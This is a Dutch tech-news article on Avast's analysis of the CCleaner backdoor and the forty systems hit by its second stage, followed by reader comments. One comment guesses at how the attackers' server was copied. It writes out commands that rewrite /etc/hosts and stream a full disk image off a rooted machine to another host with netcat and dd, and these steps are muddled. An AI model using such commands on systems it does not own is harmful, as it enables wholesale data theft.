Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Avast: malware kwam via CCleaner-backdoor op veertig systemen terecht

Avast, moederbedrijf van CCleaner-ontwikkelaar Piriform, heeft de volledige gegevens van de c2-server in handen gekregen, die met een backdoor in de software in verbinding stond. Op basis daarvan zegt het bedrijf dat veertig systemen malware ontvingen via de backdoor.

Volgens het bedrijf ging het daarbij om de second stage payload en waren de systemen vervolgens 'daadwerkelijk vatbaar voor kwaadaardige code'. De eerste trap van de malware, de backdoor zelf, diende voor het verzamelen van systeeminformatie, zo bleek uit een eerdere analyse. De tweede trap bestond uit een trojan waarmee uiteindelijk code op geïnfecteerde systemen uitgevoerd kon worden. Vorige week werd duidelijk dat de aanvallers achter de CCleaner-hack zich op grote techbedrijven richtten.

Doordat Avast nu over de volledige MySQL-database van een back-up-c2-server beschikt, kan het de volledige lijst van doelwitten publiceren. Dit is een aanvulling op de lijst die beveiligingsbedrijf Talos vorige week al publiceerde. Onder meer de twee bedrijven met de meeste geïnfecteerde systemen, in beide gevallen meer dan negen, ontbraken in dat overzicht. Het gaat om het Japanse NEC en het Taiwanese Chunghwa Telecom. Volgens Avast zijn deze bewust verwijderd uit de database, nadat de tweede trap van de malware was uitgestuurd.

De volledige gegevens, met uitzondering van een periode van veertig uur, stellen Avast in staat om meer statistieken te publiceren. Zo blijkt dat in totaal meer dan 1,5 miljoen unieke pc's verbinding maakten met de c2-server en dat er meer dan 5,5 miljoen verbindingen plaatsvonden. Uit de logbestanden van de server blijkt verder dat de aanvallers veelvuldig inlogden, in totaal 83 keer. Avast zegt in de toekomst meer informatie te willen publiceren over de tweede trap van de malware.

Door

Nieuwsredacteur

40 Linkedin Google+

Reacties (40)

Wijzig sortering
Misschien is Windows 10S voor de massa toch niet een slechte idee... Het gaat nu veel beter dan de windows 98~XP tijd en de boosters en cleaners, maar veel gebruiken dat soort programma’s nog.

Ook zou veel beter zijn als ontwikkelaars de huidige Windows installer vervangen voor het modern appx installer, op deze manier kan een installatie clean ongedaan worden gemaakt en je hebt geen cleaners nodig.
Het zou handig zijn als Windows automatisch een cleaner heeft :)
Het zou handiger zijn als Windows uberhaupt geen bende maakt.

Installeren en deinstalleren moet zuiver kunnen.
Installeren en deinstalleren moet zuiver kunnen.
Dat hoor ik nu al 30 jaar. En het is nog niemand gelukt, laten we dus aannemen dat het werkelijk niet zo eenvoudig is.

Overigens ruimt CCleaner geen orphan files op met enige efficiency.
Zo eenvoudig is het wel. De theorie is zelfs heel eenvoudig:

De installer plaatst de applicatie en registreert zich keurig in het configuratiescherm. De applicatie beheert zijn gegevens onder appdata en indien nodig in het register. Bij het deinstalleren draait de installer de deinstallatie routine van de applicatie, welke op haar beurt de registersleutels verwijderd en de appdata. De installer schrijft zich netjes uit en voila.

Het probleem dat ontstaat door zwervende data is omdat applicaties amper méér deinstalleren dan de applicatiemap (luie/slordige ontwikkelaars). Je kunt dit gemak noemen, mocht je het immers nog eens herinstalleren dan kunnen instellingen behouden zijn, maar het geeft na jaren Windowsgebruik een zooitje.

Zwervende appdata vreet niet meer dan hardeschijfruimte. Maar registersleutels, services en drivers kunnen op den duur Windows verstikken.

En dan hebben we het nog niet eens gehad over wat Windows allemaal zelf accumuleert in de loop van tijd.
Wat vind je van het volgende "idee":

Om te beginnen is een programma altijd self-contained, geen shared dependencies onder normale omstandigheden. Denk aan Apple's [mono]AppName.app[/mono] bundles. Het deinstalleren van een app is het verwijderen van die map. Het is dus niet mogelijk dat een app een gedeelde dependency installeert onder normale omstandigheden.*

Het starten van de app registreert de app in het OS. Dit geeft de app rechten om bestanden aan te maken op het systeem, en toegang tot enkele standaard easy-to-use databases (bijv. een key/value store, een cache-achtige store en/of een simpele SQL database). Alle data die de app wegschrijft blijft binnen de scope van die app en onder normale omstandigheden kan je deze bestanden niet inzien (d.w.z. ze staan verstopt in een map per app).

Wanneer je bijv. een app als photoshop hebt en je wil een afbeelding exporteren buiten de ownership van die app om, moet dat via een OS-specifiek prompt die de gebruiker vraagt waar het bestand moet worden opgeslagen. Via deze prompt, die altijd hetzelfde is en vertrouwd door de gebruiker, worden de bestanden aangemaakt onder de scope van de gebruiker, en niet de app.

Zodra je de app verwijdert, kan je optioneel ook alle data verwijderen van deze app. Via een configuratie scherm kan je inzien hoeveel data iedere app opslaat en met 1 knop verwijderen, ook wanneer de app niet meer bestaat of corrupt is. Alleen de bestanden die geexporteerd zijn via de "file prompt" blijven bestaan onder de gebruiker.

Zodra je de gebruiker verwijdert, worden alle bestanden onder die gebruiker ook verwijderd, samen met al zijn apps.

Er is nog een uitzondering: Globaal installeren van apps. In dat geval heeft een app 2 data mappen: 1 per gebruiker, en 1 globaal. Bij het verwijderen van de gebruiker wordt de app data map van die gebruiker verwijderd.

Volgens mij met mijn bovengenoemde situatie heb je geen merkbare beperkingen als gebruiker en lekt er nergens data nadat je een app en zijn app-data verwijdert.

Volgens mij is overigens dit de manier hoe iOS, Android en OSX ongeveer werken.

*Gedeelde depencies: We kunnen natuurlijk ook gedeelde dependencies met een package manager beheren. Bijhouden welke app welke dependency gebruikt en dan de dependencies kunnen verwijderen zodra geen apps er meer gebruik van maken. Volgens mij is dit een feature van vele Linux systemen. Alleen dan wel automatisch dependencies verwijderen, bijv. 30 dagen nadat ze niet meer gebruikt zijn, en niet de user verwachten af en toe op een "opruimen" knop te drukken.

Tot slot, de bovengenoemde regels strict naleven, uitzonderingen alleen toestaan met een dikke knipperende rode banner en alleen met het hoogste niveau aan administratierechten. Vanzelfsprekend mogen apps geen data inlezen die niet van hunzelf zijn, tenzij de gebruiker dit via een OS file prompt heeft gedaan, waarin een app kan vragen van "hey, welk bestand mag ik openen?" en dat het OS dan een scherm toont, of een situatie waarbij de gebruiker een bestand in de app kan slepen waarbij die app dan een event krijgt met "hey, je mag dit bestand inzien!". Ook alle apps in een standbox en/of andere stricte manieren om ook niet stieken geheugen te kunnen manipuleren buiten zijn eigen scope

[Reactie gewijzigd door Gamebuster op 26 september 2017 09:53]

Fijn.
Die apps ga ik nooit gebruiken, de data is namelijk niet van het programma maar van mij als gebruiker.
En als die "apps" weer verdwijnen, hebben ze mijn data met rust te laten. Gaat met een ander programma wel weer verder als het moet.
Overigens, als je een gebruiker verwijderd blijven de user-directory en bestanden normaal gesproken bestaan, die moet je eventueel apart verwijderen. Zowel in windows als linux, is mijn ervaring.
De meeste data die apps genereren zijn van de apps zelf. Denk aan cache en andere tijdelijke bestanden. Ook configuratie files e.d.. De enige bestanden die van jou zijn, zijn de bestanden waarvan jij aangeeft dat ze van jou zijn, door op "opslaan" of "export" te klikken, waarbij het OS een venster/popup geeft waarin jij je gewenste locatie en/of filename kan opgeven, en/of gewoon op "OK" of bevestigen kan klikken.

Zo sta je nooit verbaast wanneer er ergens diep in een verborgen map 10-tal gigabytes aan cache staat van een programma dat je niet eens meer op je systeem hebt staan. Want dat is de huidige realiteit: Je installeert een programma. Deze heeft diepe toegang tot het bestandssysteem en kan overal zijn zooi wegschrijven, en vervolgens verwijder je het programma en zijn gigabytes aan data blijft verspreid door je systeem staan. Geen idee of de bestanden gebruikt worden, door wat/wie ze gebruikt worden, waar ze voor zijn, etc.

Dat is gewoon stom en totaal niet gebruikersvriendelijk. Voor de consument levert dat alleen onverwacht volle HDD's op vol met crap, adware, configuratie-files verspreid door je systeem in AppData, C:\, je home directory etc., waarvan vaak niet duidelijk waar het vandaan komt, of het nog gebruikt wordt en of je het veilig kan verwijderen. Voor de professionals (sprekende als software developer) is het bovengenoemde systeem ook prima bruikbaar en zit het totaal niet in de weg, mits er iets langer over wordt nagedacht dan de 5 minuten die ik nodig had bij het uittypen ervan.
Met deze uitleg ben ik het met je eens, maar: een behoorlijk programma strooit "zijn" data niet rond in het systeem, maar houdt het georganiseerd. En beheerd een cache zodat die niet te groot wordt, en verwijderd deze bij deinstallatie. En apps lust ik niet. Ik gebruikt gewoon programma's.
OS'en zouden een lijst met permissies per programma bij kunnen houden, onderdeel van de setup, user editable, niet door het programma...
(pgmdir=, cfgdir=, pgmdtadir=, usrdtadir=, transientcache=, persistentcache=, ...)
Daarvoor is appx gekomen, bestaande Windows applicaties schrijven in zoveel verschillende mappen hun data weg dat het geen doen is omdat allemaal bij te houden.

appx zorgt ervoor dat de applicatie in een container wordt geïnstalleerd die bij een deïnstallatie zo verwijderd kan worden. Dit zorgt er dus ook voor dat er geen rommel meer achter blijft (bestanden en register sleutels).

Het gebruik van appx maakt software voor de gebruiker nog veiliger ook omdat de applicatie niet meer zomaar overal bij kan.

[Reactie gewijzigd door bauke1994 op 25 september 2017 17:02]

Inderdaad, maar de adoptie van appx loopt best wel langzaam... Misschien moet Microsoft een beetje motivatie uitvoeren, een deadline voor het einde support van .msi (en andere installers) in Windows. _/-\o_
Ik zie dat niet gebeuren. Dat zou letterlijk het einde van Windows 10 zijn.
Ja, dat zou veel fijner zijn :)
Die is er ook, maar heel basic
Dat heet schijfopruiming :+
Vind het wel meevallen. Temp files en Windows Update cache nemen vaak het meeste in beslag samen met dump files. Kan ook gewoon via schijfopruiming.
Temp files worden als het goed is (maar correct me if I'm wrong) automagisch verwijderd, net zoals /tmp onder linux. Of iig, dat zou zo moeten. Net zoals de windows update cache. Schijfopruiming moet automagisch elke maand, onder water draaien.
Blijkbaar niet. Zojuist even gechecked en zie nog veel temp files staan in de directory. Met Linux wordt het volgens mij wel gedaan, maar weet ik niet zeker.
Veel linux distro's hebben /tmp als tmpfs, wat in de RAM staat. Computer uit betekent dus ook dat alles in 1x weg is. https://en.wikipedia.org/wiki/Tmpfs

Je hebt dan ook nog /var/tmp wat gebruikt wordt voor dingen die wel behouden moeten worden.

[Reactie gewijzigd door Yoshi2889 op 25 september 2017 21:04]

Windows houdt niet actief de temp map(pen) leeg. Pas als ruimte een gebrek wordt komt Windows pas een melding geven met de schrijfopruiming, waarbij de temp wel default aangevinkt is.
Niet echt. Als ik zie hoeveel er in de %temp% folder staat, en dan heb ik het nog niet over programma's die hun eigen temp folder aanhouden. Installers die hun eigen temp folder aanmaken voor een ongecomprimeerde versie, resten van programma's die na een uninstall overblijven.
Dat heeft Windows toch ook? 'Windows schijfopruiming' of 'Windows Disc Cleanup' in het Engels. Type het gewoon in wanneer je de start menu openend (of zoekopdracht) en daar staat ie.. Anders kan je het altijd nog via het eigenschappen venster van het des betreffende partitie openen.
Het zou handig zijn als we eens een geheel nieuw OS zouden zien van een heel andere partij. Dus iets heel anders dan Windows, OSX, Unixbased stuff of Linux. Heb een tijdje ZorinOS gedraaid. Linuxbased, maar wel Windows~ish en het draaide Battlefield 4, 1 en Far Cry 4 heel soepel.

Beetje offtopic, maar goed.
Zou opzich wel handig zijn :)
en in een Windows lockin eindigen zoals ios en een beetje android?
Nee. Je kunt appx buiten de Windows store om gewoon installeren. Dit heet sideloading. Sideloading staat standaard aan. Bedrijven kunnen er voor kiezen om sideloading uit te zetten om bedrijfspolicies te handhaven.
Dat kan inderdaad maar zover ik weet is het niet mogelijk om een dustributienetwerk buiten microsoft om te maken. Een amazon app store achtige diest zit er bij windows 10 niet echt in.
Je bedoeld zoals Steam? Maar jij bedoeld wellicht dan met appx? Jawel hoor. Je kunt een store maken welke mensen dan kunnen installeren als ze dat willen. En via jouw store kun je dan oude MSI-installers gebruiken of AppX of zelfs wat anders. AppX kun je ook via de commandline of powershell maken, installeren en deinstalleren. Voor je store zelf kun je diverse programmeertalen en installers gebruiken.
Heb zelf winutilities pro gepiraat een paar jaar geleden, firewall erover heen en klaar is kees. Goede software.
Vorige week bij een klant CCleaner gebruikt. Eerst met de hand temp leeggegooid om ruimte te maken voor Ccleaner, vervolgens 200GB aan temporary internet files weggegooid. De grap is dat die in de instellingen op max 250MB stond. Rara...
...vervolgens 200GB aan temporary internet files weggegooid. De grap is dat die in de instellingen op max 250MB stond. Rara...
Voor welke browser gold die instelling? Vast niet voor de browser die het meest gebruikt werd.
Het is maar de vraag of het inderdaad zo beperkt is. Op Ars Technica staat een uitgebreid verhaal waaruit blijkt Avast zich baseert op een analyse van een korte tijd waarin de malware actief is. Het daadwerkelijk aantal besmettingen kan makkelijk in de miljoenen lopen.

Waarschijnlijk weten we over een paar maanden pas of Avast de boel opzettelijk aan het downplayen is (dat denk ik wel) of dat het wel meevalt.
Als ik het goed begrijp, heeft Avast het hier over de uiteindelijke malware, niet de infectie. De infectie bestond uit 2 delen, waarvan deel 1 een analyse / spyware stap was, en deel 2 echt malware verspreidde. Avast claimt dus dat door stap 2 maar 40 systemen zijn besmet.
Hoe kom je in godsnaam aan de backup van een C&C server? Dat is toch een server van criminelen? Hebben ze die gewoon gehackt? (Als je het de politie vraagt kost het wel iets meer tijd)
DD & NC (Netcat) en optioneel PV (Pipe Viewer) gok ik

Men heeft waarschijnlijk de C&C server kunnen kraken, root toegang verkregen.
En vanaf dat punt is het een fluitje van een cent om relatief snel een complete byte for byte image te maken van de server en deze on the fly te versturen naar de gewenste bestemming een eigen server bijv.

Bij de slachtoffer:
In etc/hosts een loopback maken naar de server waarop je de image wilt opslaan
iets van

rm /etc/hosts
echo "127.0.0.1 localhost" > /etc/hosts
echo "IP adres van eigen server" >> /etc/hosts

etc etc etc
Dan nog even netcat en DD de opdracht geven

nc -l -p 9000 | dd of=/dev/sdXX

Op de machine waarop je de image wilt hebben:

dd if=/dev/sda | nc 192.168.0.254"slachtoffer IP" 9000

Paar stapjes er tussen uit gelaten maar redelijk eenvoudig zodra er root toegang is,

Dit smerige trucje werkte trouwens ook prima bij android toestellen voor 4.3 :+
Enkel busybox & root nodig

[Reactie gewijzigd door osmosis op 25 september 2017 22:11]

Even voor de duidelijkheid. Hebben de (een of enkele) programmeurs van Piriform nu net voor de overname door Avast deze backdoor ingebakken? Wie anders had toegang tot de bron code?
Zijn er al mensen voor opgepakt?

Op dit item kan niet meer gereageerd worden.


Apple iPhone X Google Pixel 2 XL LG W7 Samsung Galaxy S9 Google Pixel 2 Far Cry 5 Microsoft Xbox One X Apple iPhone 8

© 1998 - 2017 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Hardware.Info de Persgroep Online Services B.V. Hosting door True

*